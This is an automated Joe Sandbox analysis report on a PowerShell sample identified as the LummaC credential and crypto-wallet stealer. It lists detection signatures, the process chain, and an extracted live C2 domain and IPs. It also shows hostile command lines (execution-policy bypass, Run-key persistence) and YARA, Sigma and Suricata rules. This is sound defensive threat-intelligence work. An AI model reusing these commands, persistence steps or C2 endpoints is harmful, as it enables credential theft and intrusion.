Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IaslcsMo.ps1

Overview

General Information

Sample name:IaslcsMo.ps1
Analysis ID:1562214
MD5:d7c9613ed12144aea20bee90fd5057e5
SHA1:268f3d77e4b82f68c842a4c01f96a6ba864c09fb
SHA256:aa22e017141e1c5974e00c72f2de158072cf9279cfedff86ac1734c6947a19e8
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 1856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Set-up.exe (PID: 5052 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
      • more.com (PID: 3592 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
        • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 2232 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • powershell.exe (PID: 6428 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Set-up.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • more.com (PID: 1272 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6944 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • Set-up.exe (PID: 6048 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["marchhappen.cyou"], "Build id": "MeHdy4--pl8vs06"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000003.2177293553.0000000003427000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000003.2238461589.000000000342F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.2192626392.0000000004397000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000009.00000003.2199449864.0000000003423000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000009.00000003.2238430241.0000000003428000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              13.2.msiexec.exe.513aacd.6.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                13.2.msiexec.exe.513aacd.6.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x1dd27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x1ddb2:$s1: CoGetObject
                • 0x1dd0b:$s2: Elevation:Administrator!new:
                9.2.msiexec.exe.51e06cd.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  9.2.msiexec.exe.51e06cd.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x1d127:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x1d1b2:$s1: CoGetObject
                  • 0x1d10b:$s2: Elevation:Administrator!new:
                  10.2.more.com.439da00.4.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 37 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_1856.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                    • 0x1dbbdd3:$b1: ::WriteAllBytes(
                    • 0x1dbbd9f:$b2: ::FromBase64String(
                    • 0x1dc9fac:$s1: -join
                    • 0x1dc3758:$s4: +=
                    • 0x1dc381a:$s4: +=
                    • 0x1dc7a41:$s4: +=
                    • 0x1dc9b5e:$s4: +=
                    • 0x1dc9e48:$s4: +=
                    • 0x1dc9f8e:$s4: +=
                    • 0x1dd4e19:$s4: +=
                    • 0x1dd4f1d:$s4: +=
                    • 0x1dd8379:$s4: +=
                    • 0x1dd8a59:$s4: +=
                    • 0x1dd8f0f:$s4: +=
                    • 0x1dd8f64:$s4: +=
                    • 0x1dd91d8:$s4: +=
                    • 0x1dd9207:$s4: +=
                    • 0x1dd974f:$s4: +=
                    • 0x1dd977e:$s4: +=
                    • 0x1dd985d:$s4: +=
                    • 0x1ddbaf4:$s4: +=

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2232, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", ProcessId: 6428, ProcessName: powershell.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2232, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1", ProcessId: 6428, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", ProcessId: 1856, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1856, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
                    Sigma detected: Msiexec Initiated Connection
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.2.224, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2232, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1856, TargetFilename: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1", ProcessId: 1856, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T10:54:27.181198+010020283713Unknown Traffic192.168.2.449736104.21.2.224443TCP
                    2024-11-25T10:54:29.847246+010020283713Unknown Traffic192.168.2.449737104.21.2.224443TCP
                    2024-11-25T10:54:32.277939+010020283713Unknown Traffic192.168.2.449738104.21.2.224443TCP
                    2024-11-25T10:54:34.691302+010020283713Unknown Traffic192.168.2.449739104.21.2.224443TCP
                    2024-11-25T10:54:37.092994+010020283713Unknown Traffic192.168.2.449740104.21.2.224443TCP
                    2024-11-25T10:54:40.740867+010020283713Unknown Traffic192.168.2.449741104.21.2.224443TCP
                    2024-11-25T10:54:44.455907+010020283713Unknown Traffic192.168.2.449743104.21.2.224443TCP
                    2024-11-25T10:54:48.033683+010020283713Unknown Traffic192.168.2.449755104.21.2.224443TCP
                    2024-11-25T10:54:50.166527+010020283713Unknown Traffic192.168.2.449761172.67.75.40443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T10:54:27.904326+010020546531A Network Trojan was detected192.168.2.449736104.21.2.224443TCP
                    2024-11-25T10:54:30.605000+010020546531A Network Trojan was detected192.168.2.449737104.21.2.224443TCP
                    2024-11-25T10:54:48.760831+010020546531A Network Trojan was detected192.168.2.449755104.21.2.224443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T10:54:27.904326+010020498361A Network Trojan was detected192.168.2.449736104.21.2.224443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T10:54:30.605000+010020498121A Network Trojan was detected192.168.2.449737104.21.2.224443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T10:54:42.656039+010020480941Malware Command and Control Activity Detected192.168.2.449741104.21.2.224443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://marchhappen.cyou/apiAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: more.com.3592.6.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["marchhappen.cyou"], "Build id": "MeHdy4--pl8vs06"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\wpkoqtsrtReversingLabs: Detection: 62%
                    Source: C:\Users\user\AppData\Local\Temp\yhgReversingLabs: Detection: 62%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\wpkoqtsrtJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\yhgJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmpString decryptor: marchhappen.cyou
                    Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: Set-up.exe, 00000005.00000002.2017343789.000000006BD29000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_40ee719a-a

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 13.2.msiexec.exe.513aacd.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.msiexec.exe.51e06cd.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.more.com.439da00.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.Set-up.exe.3a81877.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.more.com.5049a00.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Set-up.exe.3ae5877.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.msiexec.exe.519aa00.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.Set-up.exe.3ac7544.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.Set-up.exe.3ac6944.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Set-up.exe.3753544.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Set-up.exe.3752944.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.more.com.508eacd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Set-up.exe.3b2b544.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.more.com.508f6cd.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Set-up.exe.3b2a944.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.msiexec.exe.51dfacd.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.more.com.43e2acd.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.more.com.43e36cd.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.msiexec.exe.50f5a00.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.msiexec.exe.513b6cd.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Set-up.exe.370d877.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.2192626392.0000000004397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2351954654.0000000005194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2162484499.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2192707284.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 5052, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: more.com PID: 3592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 2212, type: MEMORYSTR
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49743 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.4:49761 version: TLS 1.2
                    Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Set-up.exe, 00000008.00000002.2146378325.000000006BB51000.00000020.00000001.01000000.00000010.sdmp
                    Source: Binary string: msvcp100.i386.pdb source: Set-up.exe, Set-up.exe, 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp
                    Source: Binary string: dmprocessxmlfiltered.pdbGCTL source: more.com, 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: Set-up.exe, 00000005.00000002.2016219461.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016592480.0000000003EDE000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016345332.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2099881522.0000000005100000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2099593586.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2121445829.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2131316446.00000000042BD000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2125975739.0000000003F00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Set-up.exe, 00000005.00000002.2016219461.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016592480.0000000003EDE000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016345332.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2099881522.0000000005100000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2099593586.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2121445829.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2131316446.00000000042BD000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2125975739.0000000003F00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: dmprocessxmlfiltered.pdb source: more.com, 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: Set-up.exe, 00000005.00000002.2039669387.000000006F031000.00000020.00000001.01000000.0000000A.sdmp, Set-up.exe, 00000008.00000002.2170359070.000000006F031000.00000020.00000001.01000000.0000000A.sdmp
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB781A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6BB781A1
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBAC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,5_2_6BBAC8FD
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBACC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,5_2_6BBACC23
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 4x nop then or byte ptr [edi], dh5_2_6BB67270

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49755 -> 104.21.2.224:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: marchhappen.cyou
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: rentry.co
                    Source: Joe Sandbox ViewIP Address: 172.67.75.40 172.67.75.40
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.2.224:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.2.224:443
